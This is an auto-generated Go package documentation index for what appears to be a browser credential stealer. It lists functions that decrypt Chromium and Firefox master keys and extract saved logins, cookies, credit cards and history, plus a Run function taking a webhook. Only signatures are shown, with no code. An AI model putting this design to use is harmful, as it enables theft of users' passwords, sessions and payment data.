Documentation
¶
Index ¶
- func DPAPI(encryptPass []byte) ([]byte, error)
- func GetChromiumBrowsers() map[string]string
- func GetDBConnection(database string) (*sql.DB, error)
- func GetGeckoBrowsers() map[string]string
- func Run(webhook string)
- type ASN1PBE
- type Browser
- type Chromium
- func (c *Chromium) Decrypt(encryptPass []byte) ([]byte, error)
- func (c *Chromium) GetCookies(path string) (cookies []Cookie, err error)
- func (c *Chromium) GetCreditCards(path string) (creditCards []CreditCard, err error)
- func (c *Chromium) GetDownloads(path string) (downloads []Download, err error)
- func (c *Chromium) GetHistory(path string) (history []History, err error)
- func (c *Chromium) GetLogins(path string) (logins []Login, err error)
- func (c *Chromium) GetMasterKey(path string) error
- type Cookie
- type CreditCard
- type Download
- type Gecko
- func (g *Gecko) Decrypt(encryptPass []byte) ([]byte, error)
- func (g *Gecko) GetCookies(path string) (cookies []Cookie, err error)
- func (g *Gecko) GetDownloads(path string) (downloads []Download, err error)
- func (g *Gecko) GetHistory(path string) (history []History, err error)
- func (g *Gecko) GetLogins(path string) (logins []Login, err error)
- func (g *Gecko) GetMasterKey(path string) error
- type History
- type Login
- type Profile
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
func GetChromiumBrowsers ¶
func GetGeckoBrowsers ¶
Types ¶
type ASN1PBE ¶
func NewASN1PBE ¶
type Chromium ¶
type Chromium struct {
MasterKey []byte
}
func (*Chromium) GetCookies ¶
func (*Chromium) GetCreditCards ¶
func (c *Chromium) GetCreditCards(path string) (creditCards []CreditCard, err error)
func (*Chromium) GetDownloads ¶
func (*Chromium) GetHistory ¶
func (*Chromium) GetMasterKey ¶
type CreditCard ¶
type Gecko ¶
type Gecko struct {
MasterKey []byte
}
func (*Gecko) GetDownloads ¶
func (*Gecko) GetMasterKey ¶
Click to show internal directories.
Click to hide internal directories.